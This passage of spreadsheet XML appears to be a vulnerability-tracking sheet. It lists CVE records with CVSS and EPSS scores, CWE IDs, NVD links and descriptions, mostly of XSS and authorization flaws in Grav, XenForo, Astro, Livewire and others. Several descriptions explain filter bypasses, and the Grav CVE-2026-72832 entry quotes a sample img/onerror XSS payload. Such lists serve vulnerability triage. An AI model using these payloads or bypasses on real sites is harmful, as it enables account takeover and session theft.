      <c r="D5360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5360" s="5" t="inlineStr"/>
      <c r="F5360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5360" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5360" s="5" t="inlineStr"/>
      <c r="I5360" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5360" s="5" t="inlineStr"/>
      <c r="K5360" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5360" s="5" t="inlineStr">
        <is>
          <t>node-re2 p</t>
        </is>
      </c>
      <c r="M5360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71498</t>
        </is>
      </c>
    </row>
    <row r="5361">
      <c r="A5361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71503</t>
        </is>
      </c>
      <c r="C5361" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5361" s="5" t="inlineStr"/>
      <c r="F5361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5361" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5361" s="5" t="inlineStr"/>
      <c r="I5361" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J5361" s="5" t="inlineStr"/>
      <c r="K5361" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5361" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a reflected cross-site scripting vulnerability in the extra fields administration template where the type request parameter is echoed without JavaScript-context encoding into an inline script block and no Content-Security-Policy header is emitted. An unauthenticated attacker can cause an authenticated administrator to open a crafted URL to execute arbitrary JavaScript in that session and create a persistent administrator account.</t>
        </is>
      </c>
      <c r="M5361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71503</t>
        </is>
      </c>
    </row>
    <row r="5362">
      <c r="A5362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72747</t>
        </is>
      </c>
      <c r="C5362" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5362" s="5" t="inlineStr"/>
      <c r="F5362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5362" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5362" s="5" t="inlineStr"/>
      <c r="I5362" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5362" s="5" t="inlineStr"/>
      <c r="K5362" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5362" s="5" t="inlineStr">
        <is>
          <t>AVideo fails to sanitize the phone field during user registration, allowing unauthenticated attackers to inject malicious JavaScript that persists in the database. When administrators visit the users management page, the unsanitized phone value is rendered via innerHTML, executing the injected script in the admin's browser session.</t>
        </is>
      </c>
      <c r="M5362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72747</t>
        </is>
      </c>
    </row>
    <row r="5363">
      <c r="A5363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72832</t>
        </is>
      </c>
      <c r="C5363" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5363" s="5" t="inlineStr"/>
      <c r="F5363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5363" s="5" t="inlineStr"/>
      <c r="H5363" s="5" t="inlineStr"/>
      <c r="I5363" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J5363" s="5" t="inlineStr"/>
      <c r="K5363" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5363" s="5" t="inlineStr">
        <is>
          <t>Grav versions from 1.5.2 through 2.0.12 contain a stored cross-site scripting vulnerability in the Security::detectXss() function (system/src/Grav/Common/Security.php). The event-handler scan is anchored at `&lt;` and uses `[^&gt;]*?`, which cannot cross the first literal `&gt;`; when a `&gt;` appears inside a quoted attribute value the browser keeps the tag open and parses a subsequent event handler (e.g. onerror), so the detector and browser disagree. A page editor without admin.super privileges can save page content such as `&lt;img src=x title="&gt;" onerror=alert(document.domain)&gt;`, which is accepted, stored, and executed in the site origin when any visitor (including unauthenticated users) views the page. Fixed in 2.0.13.</t>
        </is>
      </c>
      <c r="M5363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72832</t>
        </is>
      </c>
    </row>
    <row r="5364">
      <c r="A5364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73037</t>
        </is>
      </c>
      <c r="C5364" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5364" s="5" t="inlineStr"/>
      <c r="F5364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5364" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5364" s="5" t="inlineStr"/>
      <c r="I5364" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5364" s="5" t="inlineStr"/>
      <c r="K5364" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5364" s="5" t="inlineStr">
        <is>
          <t>Next AI Draw.io 0.2.1 through 0.4.16 contains a reflected cross-site scripting vulnerability in the mcp query parameter that is interpolated without escaping into HTML and JavaScript. Attackers can craft malicious URLs to execute arbitrary JavaScript in the localhost origin, enabling exfiltration of diagram sessions and API data.</t>
        </is>
      </c>
      <c r="M5364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73037</t>
        </is>
      </c>
    </row>
    <row r="5365">
      <c r="A5365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73317</t>
        </is>
      </c>
      <c r="C5365" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5365" s="5" t="inlineStr"/>
      <c r="F5365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5365" s="5" t="inlineStr"/>
      <c r="H5365" s="5" t="inlineStr"/>
      <c r="I5365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5365" s="5" t="inlineStr"/>
      <c r="K5365" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5365" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a missing authorization vulnerability in the ACP cache-rebuild dispatcher that allows limited administrators with only the rebuildCache permission to perform unauthorized approval queue actions by supplying an arbitrary job class and actor user ID in the POST body. Attackers can invoke the approval queue job under any user identity to approve queued user registrations without holding the required approval-queue or moderator permissions, causing the moderation log to attribute actions to an impersonated account.</t>
        </is>
      </c>
      <c r="M5365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t>
        </is>
      </c>
    </row>
    <row r="5366">
      <c r="A5366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73318</t>
        </is>
      </c>
      <c r="C5366" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5366" s="5" t="inlineStr"/>
      <c r="F5366" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5366" s="5" t="inlineStr"/>
      <c r="H5366" s="5" t="inlineStr"/>
      <c r="I5366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5366" s="5" t="inlineStr"/>
      <c r="K5366" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5366" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a missing authorization vulnerability in the force-agreement controller that allows any ACP administrator to access and submit force-agreement forms regardless of their assigned permissions. Attackers can bypass the option permission declared in the navigation configuration to update the global policy last-updated timestamp, forcing all users to re-agree to the privacy policy or terms of service.</t>
        </is>
      </c>
      <c r="M5366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73318</t>
        </is>
      </c>
    </row>
    <row r="5367">
      <c r="A5367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73319</t>
        </is>
      </c>
      <c r="C5367" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5367" s="5" t="inlineStr"/>
      <c r="F5367" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5367" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5367" s="5" t="inlineStr"/>
      <c r="I5367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5367" s="5" t="inlineStr"/>
      <c r="K5367" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5367" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a cross-site scripting vulnerability in the dynamic redirect handler that allows unauthenticated attackers to execute arbitrary JavaScript in the board origin by crafting a malicious javascript: URI that bypasses host validation. Attackers can embed the board hostname in the URI authority component and use percent-encoded newlines to evade server-side filters, causing authenticated users who perform a Follow action to execute attacker-supplied JavaScript in their browser.</t>
        </is>
      </c>
      <c r="M5367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t>
        </is>
      </c>
    </row>
    <row r="5368">
      <c r="A5368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73320</t>
        </is>
      </c>
      <c r="C5368" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5368" s="5" t="inlineStr"/>
      <c r="F5368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5368" s="5" t="inlineStr"/>
      <c r="H5368" s="5" t="inlineStr"/>
      <c r="I5368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5368" s="5" t="inlineStr"/>
      <c r="K5368" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5368" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an unauthenticated information disclosure vulnerability that allows unauthenticated attackers to retrieve private unfurl records by supplying predictable auto-increment primary key IDs to the unfurl endpoint. Attackers can enumerate or predict result IDs and query the endpoint without any session, user, or visibility checks to obtain rendered preview HTML, original URLs, and query strings from private conversations and other restricted content.</t>
        </is>
      </c>
      <c r="M5368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t>
        </is>
      </c>
    </row>
    <row r="5369">
      <c r="A5369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73409</t>
        </is>
      </c>
      <c r="C5369" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5369" s="5" t="inlineStr"/>
      <c r="F5369" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5369" s="5" t="inlineStr">
        <is>
          <t>oracle, mongodb</t>
        </is>
      </c>
      <c r="H5369" s="5" t="inlineStr"/>
      <c r="I5369" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5369" s="5" t="inlineStr"/>
      <c r="K5369" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5369" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.1, packages/server/src/integrations/mongodb.ts passed builder-controlled tlsCertificateKeyFile and tlsCAFile values directly to MongoClient on Budibase Cloud. A builder could submit absolute server paths through /api/datasources/verify and distinguish readable existing files from missing files by comparing the driver error, exposing a filesystem existence and readability oracle on the shared server. This issue is fixed in version 3.40.1.</t>
        </is>
      </c>
      <c r="M5369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73409</t>
        </is>
      </c>
    </row>
    <row r="5370">
      <c r="A5370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73423</t>
        </is>
      </c>
      <c r="C5370" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5370" s="5" t="inlineStr"/>
      <c r="F5370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5370" s="5" t="inlineStr"/>
      <c r="H5370" s="5" t="inlineStr"/>
      <c r="I5370" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5370" s="5" t="inlineStr"/>
      <c r="K5370" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5370" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 7.0.0 until 7.0.6, the composable astro/hono pipeline installs security.checkOrigin only through the middleware() primitive, while actions() and pages() can dispatch to user code independently. Mounting actions() before middleware(), as in the examples/advanced-routing example and Cloudflare Hono documentation, allows cross-origin form-encoded action requests to execute before the origin check, and using pages() without middleware() drops the check for on-demand endpoints and pages. The flaw enables blind write-only cross-site request forgery using the victim's cookies against ActionHandler.handle and PagesHandler.handleWithErrorFallback when manifest.checkOrigin is enabled; the attacker can trigger a state-mutating action or endpoint handler but cannot read the cross-origin response. The default non-composable astro() pipeline is not affected. This issue is fixed in version 7.0.6.</t>
        </is>
      </c>
      <c r="M5370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73423</t>
        </is>
      </c>
    </row>
    <row r="5371">
      <c r="A5371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73524</t>
        </is>
      </c>
      <c r="C5371" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5371" s="5" t="inlineStr"/>
      <c r="F5371" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5371" s="5" t="inlineStr"/>
      <c r="H5371" s="5" t="inlineStr"/>
      <c r="I5371" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5371" s="5" t="inlineStr"/>
      <c r="K5371" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5371" s="5" t="inlineStr">
        <is>
          <t>Cypht before 2.12.2 contains a cross-site scripting vulnerability in the contacts module that allows remote attackers to execute arbitrary script content by embedding malicious payloads within angle brackets in the FROM email header. The sanitization logic removes only the first occurrence of each angle bracket character, leaving additional angle brackets intact, which attackers exploit by delivering a crafted email whose FROM header executes script in the victim's browser when the user opens the message and accesses the Add Local Contacts function.</t>
        </is>
      </c>
      <c r="M5371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73524</t>
        </is>
      </c>
    </row>
    <row r="5372">
      <c r="A5372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74908</t>
        </is>
      </c>
      <c r="C5372" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5372" s="5" t="inlineStr"/>
      <c r="F5372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5372" s="5" t="inlineStr"/>
      <c r="H5372" s="5" t="inlineStr"/>
      <c r="I5372" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5372" s="5" t="inlineStr"/>
      <c r="K5372" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5372" s="5" t="inlineStr">
        <is>
          <t>Grav plugin-api before 1.0.15 contains a script injection vulnerability where the SVG sanitizer only checks for the exact extension 'svg', allowing .svgz and .xhtml files to bypass sanitization and be stored unsanitized. Attackers with api.media.write permission can upload files containing executable script payloads that execute in the site origin when accessed by administrators or visitors.</t>
        </is>
      </c>
      <c r="M5372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74908</t>
        </is>
      </c>
    </row>
    <row r="5373">
      <c r="A5373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75107</t>
        </is>
      </c>
      <c r="C5373" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5373" s="5" t="inlineStr"/>
      <c r="F5373" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5373" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5373" s="5" t="inlineStr"/>
      <c r="I5373" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5373" s="5" t="inlineStr"/>
      <c r="K5373" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5373" s="5" t="inlineStr">
        <is>
          <t>Grav Form Plugin before 9.1.19 fails to escape field-definition properties including prepend, append, spacer text, section text, and select option labels in form templates. Attackers with form authoring privileges can inject arbitrary HTML and JavaScript that executes for all form visitors through unescaped |raw filters and unquoted attributes.</t>
        </is>
      </c>
      <c r="M5373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75107</t>
        </is>
      </c>
    </row>
    <row r="5374">
      <c r="A5374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75831</t>
        </is>
      </c>
      <c r="C5374" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5374" s="5" t="inlineStr"/>
      <c r="F5374" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5374" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5374" s="5" t="inlineStr"/>
      <c r="I5374" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5374" s="5" t="inlineStr"/>
      <c r="K5374" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5374" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains a stored cross-site scripting vulnerability in the audio and video media rendering through the sourceParsedownElement method. The media URL fragment is concatenated unescaped into rawHtml source elements, allowing attackers to inject arbitrary HTML and JavaScript that executes in viewers' sessions.</t>
        </is>
      </c>
      <c r="M5374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75831</t>
        </is>
      </c>
    </row>
    <row r="5375">
      <c r="A5375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75834</t>
        </is>
      </c>
      <c r="C5375" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5375" s="5" t="inlineStr"/>
      <c r="F5375" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5375" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5375" s="5" t="inlineStr"/>
      <c r="I5375" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5375" s="5" t="inlineStr"/>
      <c r="K5375" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5375" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.14 contains a stored cross-site scripting vulnerability in the Security::detectXss() function (system/src/Grav/Common/Security.php). All XSS detection patterns use the PCRE /u (UTF-8) modifier, so a single invalid UTF-8 byte anywhere in page content causes preg_match() to return false for every pattern, silently bypassing the save-time XSS safety gate (Validation::checkSafety()). An authenticated attacker with page-edit permissions (without the security.xss_whitelist privilege) can store malicious JavaScript that executes in the browser of a visitor who views the affected page.</t>
        </is>
      </c>
      <c r="M5375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75834</t>
        </is>
      </c>
    </row>
    <row r="5376">
      <c r="A5376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79777</t>
        </is>
      </c>
      <c r="C5376" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5376" s="5" t="inlineStr"/>
      <c r="F5376" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5376" s="5" t="inlineStr"/>
      <c r="H5376" s="5" t="inlineStr"/>
      <c r="I5376" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5376" s="5" t="inlineStr"/>
      <c r="K5376" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L5376" s="5" t="inlineStr">
        <is>
          <t>rclone before v1.75.0 includes full Go stack traces in RC API error responses when panics occur. Attackers can trigger panics to leak internal file paths, module versions, goroutine states, and memory addresses.</t>
        </is>
      </c>
      <c r="M5376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79777</t>
        </is>
      </c>
    </row>
    <row r="5377">
      <c r="A5377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81635</t>
        </is>
      </c>
      <c r="C5377" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5377" s="5" t="inlineStr"/>
      <c r="F5377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5377" s="5" t="inlineStr"/>
      <c r="H5377" s="5" t="inlineStr"/>
      <c r="I5377" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5377" s="5" t="inlineStr"/>
      <c r="K5377" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5377" s="5" t="inlineStr">
        <is>
          <t>A cross-site scripting vulnerability exists in SHIRASAGI, which may allow an attacker to execute an arbitrary script in the web browser of a user who accesses a website using the affected product.</t>
        </is>
      </c>
      <c r="M5377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81635</t>
        </is>
      </c>
    </row>
    <row r="5378">
      <c r="A5378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81887</t>
        </is>
      </c>
      <c r="C5378" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5378" s="5" t="inlineStr"/>
      <c r="F5378" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5378" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5378" s="5" t="inlineStr"/>
      <c r="I5378" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5378" s="5" t="inlineStr"/>
      <c r="K5378" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-79</t>
        </is>
      </c>
      <c r="L5378" s="5" t="inlineStr">
        <is>
          <t>Livewire is a full-stack framework for Laravel. From 3.0.0-beta.1 until 3.8.3 and 4.3.4, the dot-notated query-string parser in js/plugins/history/index.js, including fromQueryString() and insertDotNotatedValueIntoData(), accepts the __proto__, constructor, and prototype path segments and creates inherited objects. Client-side state handlers then access effects.html, effects.js, effects.xjs, and effects.scripts without Object.prototype.hasOwnProperty.call(), allowing inherited attacker-controlled state to be treated as trusted effects. An unauthenticated attacker can craft a URL that, when opened by a user, executes arbitrary JavaScript in the affected application's origin. Exploitation requires user interaction and does not bypass server-side authorization or grant privileges beyond the affected user. This issue is fixed in versions 3.8.3 and 4.3.4.</t>
        </is>
      </c>
      <c r="M5378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81887</t>
        </is>
      </c>
    </row>
    <row r="5379">
      <c r="A5379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82024</t>
        </is>
      </c>
      <c r="C5379" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5379" s="5" t="inlineStr"/>
      <c r="F5379" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5379" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5379" s="5" t="inlineStr"/>
      <c r="I5379" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5379" s="5" t="inlineStr"/>
      <c r="K5379" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5379" s="5" t="inlineStr">
        <is>
          <t>LearnPress WordPress Plugin before 4.4.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers with the Instructor role to inject persistent malicious payloads by submitting unsanitized input into quiz question answer title fields. Attackers can store arbitrary JavaScript through the answer title parameter, which is rendered through an unescaped HTML sink to execute in the browsers of any user who views the affected quiz question, including students, other instructors, and administrators.</t>
        </is>
      </c>
      <c r="M5379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82024</t>
        </is>
      </c>
    </row>
    <row r="5380">
      <c r="A5380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="C5380" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5380" s="5" t="inlineStr"/>
      <c r="F5380" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5380" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H5380" s="5" t="inlineStr"/>
      <c r="I5380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5380" s="5" t="inlineStr"/>
      <c r="K5380" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L5380" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t>
        </is>
      </c>
      <c r="M5380" s="6" t="inlineStr">
